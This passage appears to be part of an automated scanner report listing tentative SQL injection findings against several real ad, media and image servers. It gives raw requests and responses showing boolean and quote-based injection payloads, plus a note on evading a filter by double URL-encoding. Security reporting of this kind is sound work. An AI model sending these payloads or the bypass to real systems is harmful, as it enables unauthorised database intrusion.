Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:26:15 GMT
Content-Length: 102631
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<script src="http://dcl.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/_lib/header/default.js" type="text/javascript"></script>
<script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/global/search/autoComplete.js" type="text/javascript"></script>


</head>

<body>
<script type="text/javascript">
//<![CDATA[
document.body.className = 'enhanced';
//]]>
</script>

<!--
<div class="busyIndicator">
<div class="busyVisual">
<div class="busySpinner"></div>
<div class="busyTextual hide"></div>
</div>
</div>
-->

<script type="text/javascript">if (!userType) { var userType = 'guest'; }</script>








<div id="DOLChrome">



       
<div id="gde_chromeData" class="gde_chromeData">
   <div id="gde_chromeDataHome">
       <a href="http://disney.go.com" title="Disney.com">Disney.com</a>
   </div>
   <div id="gde_chromeDataRows">
       <div id="gde_chromeDataTopRow">
           <ul>
               <li><a id="movies" href="http://disney.go.com/movies/index" title="Movies">Movies</a></li>
               <li><a id="tv" href="http://tv.disney.go.com/tv" title="TV">TV</a></li>
               <li><a id="music" href="http://disney.go.com/music/index" title="Music">Music</a></li>
               <li><a id="live_events" href="http://disney.go.com/live-events/index" title="Live Events">Live Events</a></li>
               <li><a id="books" href="http://disney.go.com/books/index" title="Books">Books</a></li>
               <li><a id="parks" href="http://disneyparks.disney.go.com/" title="Parks & Travel">Parks & Travel</a></li>
               <li><a id="store" href="http://www.disneystore.com/transfer/526272/?CMP=OTL-Dcom:ChrmShpTb" title="Store">Store</a></li>
           </ul>
       </div>
       <div id="gde_chromeDataBottomRow">
           <ul>
               <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go.com/characters/#/characters/" title="Characters & St
...[SNIP]...

Request 2

GET /media20163560'%20or%201%3d2--%20/dcl_v0400/Global/Promo/220x102/commerce-DVD.png?t=1285273958056 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:26:15 GMT
Content-Length: 33386
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/global/search/autoComplete.js" type="text/javascript"></script>
<script src="http://dcl.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/_lib/header/default.js" type="text/javascript"></script>


</head>

<body>
<script type="text/javascript">
//<![CDATA[
document.body.className = 'enhanced';
//]]>
</script>

<!--
<div class="busyIndicator">
<div class="busyVisual">
<div class="busySpinner"></div>
<div class="busyTextual hide"></div>
</div>
</div>
-->

<script type="text/javascript">if (!userType) { var userType = 'guest'; }</script>








<div id="DOLChrome">



       

   

</div><div id="bodyContainer">

<div id="loginRegForm" class="yui-navset">
   <ul class="yui-nav clearfix">
       <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li>
       <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li>
   </ul>
   <div class="yui-content">
       <div id="loginForm" class="flyoutForm">
           <form method="post" action="/login/" id="loginFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd>
                   <dt><label for="loginPassword">Password:</label></dt>
                   <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput"maxlength="25" value="" /></dd>
                   <dd class="loginFormSubmit"><input type="image" src="http://dcl.wdpromedia.com/media/dcl_v0400/Global/globalHeader/buttonLoginSubmit.png" name="submit" value="Login" /></dd>
                   <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forg
...[SNIP]...

1.4. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /media'%20and%201%3d1--%20/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg?t=1260481711585 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:27 GMT
Content-Length: 33405
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/global/search/autoComplete.js" type="text/javascript"></script>
<script src="http://dcl.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/_lib/header/default.js" type="text/javascript"></script>


</head>

<body>
<script type="text/javascript">
//<![CDATA[
document.body.className = 'enhanced';
//]]>
</script>

<!--
<div class="busyIndicator">
<div class="busyVisual">
<div class="busySpinner"></div>
<div class="busyTextual hide"></div>
</div>
</div>
-->

<script type="text/javascript">if (!userType) { var userType = 'guest'; }</script>








<div id="DOLChrome">



       

   

</div><div id="bodyContainer">

<div id="loginRegForm" class="yui-navset">
   <ul class="yui-nav clearfix">
       <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li>
       <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li>
   </ul>
   <div class="yui-content">
       <div id="loginForm" class="flyoutForm">
           <form method="post" action="/login/" id="loginFlyoutForm">
               <dl>
                   <dt><label for="loginEmailAddress">Username (e.g. Mickey123 or Goofy@disney.com):</label></dt>
                   <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd>
                   <dt><label for="loginPassword">Password:</label></dt>
                   <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput"maxlength="25" value="" /></dd>
                   <dd class="loginFormSubmit"><input type="image" src="http://dcl.wdpromedia.com/media/dcl_v0400/Global/globalHeader/buttonLoginSubmit.png" name="submit" value="Login" /></dd>
                   <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forg
...[SNIP]...

Request 2

GET /media'%20and%201%3d2--%20/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg?t=1260481711585 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:27 GMT
Content-Length: 102650
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<script src="http://dcl.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/_lib/header/default.js" type="text/javascript"></script>
<script src="http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/4.39.1.5/js/global/search/autoComplete.js" type="text/javascript"></script>


</head>

<body>
<script type="text/javascript">
//<![CDATA[
document.body.className = 'enhanced';
//]]>
</script>

<!--
<div class="busyIndicator">
<div class="busyVisual">
<div class="busySpinner"></div>
<div class="busyTextual hide"></div>
</div>
</div>
-->

<script type="text/javascript">if (!userType) { var userType = 'guest'; }</script>








<div id="DOLChrome">



       
<div id="gde_chromeData" class="gde_chromeData">
   <div id="gde_chromeDataHome">
       <a href="http://disney.go.com" title="Disney.com">Disney.com</a>
   </div>
   <div id="gde_chromeDataRows">
       <div id="gde_chromeDataTopRow">
           <ul>
               <li><a id="movies" href="http://disney.go.com/movies/index" title="Movies">Movies</a></li>
               <li><a id="tv" href="http://tv.disney.go.com/tv" title="TV">TV</a></li>
               <li><a id="music" href="http://disney.go.com/music/index" title="Music">Music</a></li>
               <li><a id="live_events" href="http://disney.go.com/live-events/index" title="Live Events">Live Events</a></li>
               <li><a id="books" href="http://disney.go.com/books/index" title="Books">Books</a></li>
               <li><a id="parks" href="http://disneyparks.disney.go.com/" title="Parks & Travel">Parks & Travel</a></li>
               <li><a id="store" href="http://www.disneystore.com/transfer/526272/?CMP=OTL-Dcom:ChrmShpTb" title="Store">Store</a></li>
           </ul>
       </div>
       <div id="gde_chromeDataBottomRow">
           <ul>
               <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go.com/characters/#/characters/" title="Characters & St
...[SNIP]...

1.5. http://fingerhut.tt.omtrdc.net/m2/fingerhut/mbox/standard [mboxSession parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://fingerhut.tt.omtrdc.net
Path:   /m2/fingerhut/mbox/standard

Issue detail

The mboxSession parameter appears to be vulnerable to SQL injection attacks. The payloads 18153420'%20or%201%3d1--%20 and 18153420'%20or%201%3d2--%20 were each submitted in the mboxSession parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /m2/fingerhut/mbox/standard?mboxHost=www.fingerhut.com&mboxSession=1305509219944-47884618153420'%20or%201%3d1--%20&mboxPage=1305509219944-478846&mboxCount=1&mbox=FHTOCP_welcome&mboxId=0&mboxTime=1305491220005&mboxURL=http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&mboxReferrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fx1.rtb%2Ffingerhut%2Fdoubledma%2Fron%2Fctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&mboxVersion=38 HTTP/1.1
Host: fingerhut.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 728
Date: Mon, 16 May 2011 01:34:28 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('FHTOCP_welcome',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default-F
...[SNIP]...
t\/css\">\n#fsCartDisplay table tbody td.ship-msg, #fsCartDisplay table tfoot, #fsCartDisplay .accountInfo .accountLink a, a#beginCheckoutAnchor2, #minAvailCred, #minAvailCred + .amount, .accountInfo .accountLink {\n\tdisplay:none;\n}\n<\/style>');document.write('</div>');mboxCurrent.setEventTime('include.end');mboxFactories.get('default').get('FHTOCP_welcome',0).loaded();mboxFactories.get('default').getPCId().forceId("1305509668723-458928.17");

Request 2

GET /m2/fingerhut/mbox/standard?mboxHost=www.fingerhut.com&mboxSession=1305509219944-47884618153420'%20or%201%3d2--%20&mboxPage=1305509219944-478846&mboxCount=1&mbox=FHTOCP_welcome&mboxId=0&mboxTime=1305491220005&mboxURL=http%3A%2F%2Fwww.fingerhut.com%2Fuser%2Fstart_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&mboxReferrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fx1.rtb%2Ffingerhut%2Fdoubledma%2Fron%2Fctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&mboxVersion=38 HTTP/1.1
Host: fingerhut.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 767
Date: Mon, 16 May 2011 01:34:29 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('FHTOCP_welcome',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-default-F
...[SNIP]...
#fsCartDisplay table tbody td.ship-msg, #fsCartDisplay table tfoot, #fsCartDisplay .accountInfo .accountLink a, a#beginCheckoutAnchor2, #minAvailCred, #minAvailCred + .amount, .accountInfo .accountLink, #credAmt, #fsCartDisplay .accountInfo {\n\tdisplay:none;\n}\n<\/style>');document.write('</div>');mboxCurrent.setEventTime('include.end');mboxFactories.get('default').get('FHTOCP_welcome',0).loaded();mboxFactories.get('default').getPCId().forceId("1305509669745-803140.17");

1.6. http://gannett.gcion.com/addyn/3.0/5111.1/809051/0/-1/ADTECH [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://gannett.gcion.com
Path:   /addyn/3.0/5111.1/809051/0/-1/ADTECH

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /addyn/3.0/5111.1/809051/0/-1/ADTECH;size=300x250;alias=www.usatoday.com/travel/cruises_Poster3;cookie=info;loc=100;target=_blank;key=cw27+cw369+cw368+cw356+cw371+cw370;kvcw=27:369:368:356:371:370;grp=227269;misc=1305508790703 HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24'
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DD077236E651A440C6EAF39F0005EB9

Response 1

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19048

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
riteln = function(str) { document.write(str + "\n"); };

   __theDocument = parent.document;
   __theWindow = parent;
}
document.write("\n");
function VBGetSwfVer_793739(i) {
var sVersion_793739 = "on error resume next\r\n"+
"Dim swControl_, swVersion_\r\n"+
"swVersion_ = 0\r\n"+
"set swControl_ = CreateObject(\"ShockwaveFlash.ShockwaveFlash.\" + CStr("+i+"))\r\n"+
"if (IsObject(swControl_)) then\r\n"+
"
...[SNIP]...

Request 2

GET /addyn/3.0/5111.1/809051/0/-1/ADTECH;size=300x250;alias=www.usatoday.com/travel/cruises_Poster3;cookie=info;loc=100;target=_blank;key=cw27+cw369+cw368+cw356+cw371+cw370;kvcw=27:369:368:356:371:370;grp=227269;misc=1305508790703 HTTP/1.1
Host: gannett.gcion.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24''
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4DD077236E651A440C6EAF39F0005EB9

Response 2

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 945

rubSect = "";
if (window.location.pathname.indexOf("life") != -1) rubSect = 7103;
else if (window.location.pathname.indexOf("money") != -1) rubSect = 7104;
else if (window.location.pathname.indexOf("n
...[SNIP]...

1.7. http://s7d5.scene7.com/is/image/bluestembrands/NC364_VA_999 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://s7d5.scene7.com
Path:   /is/image/bluestembrands/NC364_VA_999

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /is/image/bluestembrands/NC364_VA_999?$ShoppingCart$&1%20and%201%3d1--%20=1 HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 30 Mar 2010 15:39:30 GMT
ETag: "943604b62d503a5fc591697122854e85"
Content-Type: image/jpeg
Content-Length: 4123
Expires: Mon, 16 May 2011 11:36:53 GMT
Date: Mon, 16 May 2011 01:36:53 GMT
Connection: close

......JFIF.....H.H...............................    ....................!........."$".$...........................................................................d.d....................................................    ............!...1AQa."2q......#B..$Sb..%4DRcr...................................................!1.A.Q.a"2Bq.............?..].P..P..P..P..P..P..P...l....%E,GiN.@.    H$.....8.o...m..ej.\...;g.......Z.sxEg5..,..)X>.gq~J..P>...k.....l.,.,>"&...T...ely(8..../..{eV.r.Eo...
..vW..\O.5....k.d..v.9N%...O.Q.K./8.    Rw..2..R7Z..%.......]k=.Rr..{.FEr...uE.Y.L...%..K..e+J.....I.(..(..3..V.....7...@..O.R.O...x..L...~|7..T...i.s`.-^C.ud....k..n...."7..KI...T..`(V....f..Wh..k..WN..q....ki..(.8...).....s......!_...?.U....J.D9....F.....R..h.S..Z&..j.[}f{...+)L.>...J....-....R....z..(.<..q...|Ip.........J
L.....u#r......%<..)LL.......HSkObT..4.@..g...l..d...L.q.[ykW+hX..5...|...$.I..[uQ....~&..].f.n..p.3.u.d..Ada@.TT.d......T..K.*u6[<%.x.p$...4T.........(d.j[jR.H*#p..A.(.+...gt.k.gk.....H.-km.....RV..R..cm.wG....W.9%...a.%vq..f......l.v.c.*.....P|...wR..U...OS..BR...#`j../.....6......HQ.K.....BK...UW/.u}..'..T6.n..J..PD.......,.Ew$V-<<.....o.3.mHSL..E_..vW............XgEq]..E..^.....}b.krY~[.Ku@o....J....N...)..i4....g.P....%N.F.LjEE.g.....I.!8G.....-p..&.....o2...HZ.;(..j    9......[.\..C.&,UJ...'.,'.].XV..l....Q...#).M.{'k.*...mw....fM..+.P...V..9
. ......u...`.:....."e....k/..|j,.V.....Jy2...>..
%X....F.......:.F......Q0..7W.%5%nt...Q..........V...q...:...E..{..V..fY.:.6.c..[....S...].aX......3T...:%..Q...e....pmS.....I.[..,.l..q.`w. .j...o...r.,.oZf.":...=.A.....hH...)+..;WR.j<..}.q%T..i.>D..........t.T$.]...'..~j<..v..w.N.;....i}7>=....K...fbr&+c.i..g......./R.....li..^.{*q,S[.3Zn+..[.qu.t<.6B..JI.8..o)i.Oj.W+l....x..XZe:U...0V.f5nm.!...$s..........GCs...-.:R.f......h..*ve.....p.h. ..|....u......N.8&..,..FjLgP...-...)$d.T$.x..,...Jw...'.....B.....L...?.(z.....%.2BpyI......+..$.......hN3..Y...*W.....zZ{.H\..u_.q.....P}...+............i+....k..2.av...n.............d-99m[........1....j4......O2...k...[T.=n..J_I.Zy..[....e..]..{5..N.}.Yr...%...
....4....eAAi.>.O..S..cz..)i.9..WgQ.K.rv.}v].Q..qQ....%...]BJ...)<....$...*.{...CP.....E....xLK..F?)m..*@G8...G...z..:.0i..........D.....m...}...(w. .......F=<+IQ.$.
...[SNIP]...

Request 2

GET /is/image/bluestembrands/NC364_VA_999?$ShoppingCart$&1%20and%201%3d2--%20=1 HTTP/1.1
Host: s7d5.scene7.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/section/Electronics/4.uts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 30 Mar 2010 15:39:30 GMT
ETag: "ad4e8c77ab76576a7687081518de63d6"
Content-Type: image/jpeg
Content-Length: 4137
Expires: Mon, 16 May 2011 11:36:53 GMT
Date: Mon, 16 May 2011 01:36:53 GMT
Connection: close

......JFIF.....H.H...............................    ....................!........."$".$...........................................................................d.d....................................................    ............!..1A.Qaq."2.....#B...$RSb..34Dc.....................................................!1.A.Q.a"2.Bq............?..].P..P..P..P..P..P..o....[0 H.%E,GiN.@.    H...@f.^1[..8.t..qXk.s..L......P.B.o........b...Vw....%..H'..J..r........7.........PqG..^_.....|..j..5R.....z$...k'....:...v.9N%...O.Q.K./8.    P...e.^.n.O.K...6......z.......dW+.O.T^.......]i....R..!C..U$....r(.}...(...._..~..7...@..O.Q    ?..*....p32..n,..@-..k...Z..<....!..gV.|...#~....~..I...
.Y|.l..J..j..    .xqt.....ki..Q.q...S.u....D.9...B..
6.....<.~.s.7.n.....,._J......MG.......^..VU%.>...J.....d4OB    H
.......,._1.........+u.'.e....(..m.`.F.#e..4Jy7.RX...q]K.:.......I............i...l.\d...L.q.[ykW+m.uO....{.]:IX.}......1..M.Z.<.4..:.Ng.u.d..Ada@.TT.D.;WE.:..2.&T.l.xK....I.[.h..5!.}...2P.B......TF.$...Q.W..4..,.....6.j.".......JeIX...v..n0k.?$....Ih.>.~.].{.L.1^q.......~EX....J..'....~)..h.......=2H.5.U..I.Iz%..:....
6.a.>W..Iq>.UU..._x...-..........!@...S{}E...........T.m.Fb..
i.c(......@...;.Q\...k...+..h..+....\/.Z.nK/.a..n..B..iV2v...w..r..M..]?............i.O.T\.x.
,......z......es.Xa..a..X[n$-
....5..b...,.;g..    ..R..(I..    .K.+
........{.j*...g.~.....\<....3..L....xe
aium8.....=A..k.Y:.....M.+X.._..v..IW....mLa..d..-....D...oT.i#c.R.{u..D.[...q....TU.......<%...|.?/(.<..k.....v`...p{.pw^.+U....xN............9.W^.V6.r..)..0......Q.....]}u.6..mw.o..-...e6F.8..:...j...o...r.,...3b..B.Z.. .eE@D.$u.T...?....[5.Td..8..s....$%.B".$<u.......k........G...q...p......    sK......v2]lO.3..1[..Md.?.......z......cMR.c.S.b...i..qX...{..........RO..|........r..9{-7.Iu..S.P..K.n&cV..B.JyBG0..O>z.b.....nx.....JQl.tV.^....%N..|;j.q.....y    .?...^...k.....h.b.jTf..u.....ZNB.FA.BLw..R..\..yPP.|.n`.J...t..f8....C..,.Xq,.....O~....r.ds....q`.    .|P..b.J.....OKOq....n...".l........`..].}}.q....%v...Mb...W....z.xLOi...JA!.P.B........{._V.;..<-F.Zw..#t...n......A..x.%)}'!i...nH>~....t\e....8q.H2....K....m..hi.R]......~b..\..*...
R..s.........v.}v].Q..qQ..a...O..P...ce'....    52...Vy..CP...m.E....xLK.n1.Km.IR.9..."9p..kKt.....pR..2.R.Y![.9.L........P.:A..c-..
...[SNIP]...

1.8. http://serv.adspeed.com/ad.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://serv.adspeed.com
Path:   /ad.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /ad.php?do=html&zid=3253&wd=468&ht=60&tz=5&ck=Y&jv=Y&scr=1920x1200x32&ref=&r=0.505050992593/1%25271692 HTTP/1.1
Host: serv.adspeed.com
Proxy-Connection: keep-alive
Referer: http://www.passporterboards.com/forums/touring-world-parks-walt-disney-world/243302-enchanted-tiki-room-news.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

